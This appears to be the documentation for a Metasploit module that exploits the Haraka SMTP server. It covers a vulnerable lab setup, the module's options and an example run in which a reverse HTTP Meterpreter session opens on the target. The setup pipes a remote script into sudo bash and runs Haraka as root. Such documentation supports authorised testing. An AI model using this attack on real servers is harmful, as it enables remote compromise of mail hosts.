## Vulnerable Application

  Setup the vulnerable Haraka install by running this script on Ubuntu, Debian or similar:

  ```
  #install nodejs and npm
  curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash -
  sudo apt install nodejs

  #Haraka setup
  wget https://github.com/haraka/Haraka/archive/v2.8.8.tar.gz
  tar xvzf v2.8.8.tar.gz
  cd Haraka-2.8.8/
  npm install npm
  npm install

  haraka -i haraka

  cat << EOF > haraka/config/plugins
  access
  rcpt_to.in_host_list
  data.headers
  attachment
  test_queue
  max_unrecognized_commands
  EOF

  echo haraka.test >> haraka/config/host_list

  # Launch haraka as root
  sudo haraka -c haraka
  ```

## Options

  **from_email**

  String used in the SMTP MAILFROM command

  **to_email**

  String used in the SMTP MAILTO command

  **lhost**

  The address to serve the payload from

  **rhost**

  The address or hostname to target

  **payload**

  Any compatible Metasploit payload

## Example Run

  ```
msf > use exploit/linux/smtp/haraka
msf exploit(haraka) > set email_to root@haraka.test
email_to => root@haraka.test
msf exploit(haraka) > set payload linux/x64/meterpreter_reverse_http
payload => linux/x64/meterpreter_reverse_http
msf exploit(haraka) > run

[*] Started HTTP reverse handler on http://192.168.1.1:8080
[*] Exploiting...
[*] Using URL: http://192.168.1.1:8080/36CacHfIIBnBe3
[*] Sending mail to target server...
[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Redirecting stageless connection from /UJgmNdAvcM7RkNeSiIMMwg_phj2ODD0I0sgpuoWRXMCMYpHwI0ydcMlb4vVjgylZF9yr-gOpQu9aOibLROCaSBoN0tLHJRGCK0B4ZKg1aQy8LPB with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Attaching orphaned/stageless session...
[*] Meterpreter session 2 opened (192.168.1.1:8080 -> 192.168.1.2:42122) at 2017-05-10 22:41:06 -0500
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.2 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(haraka) >
  ```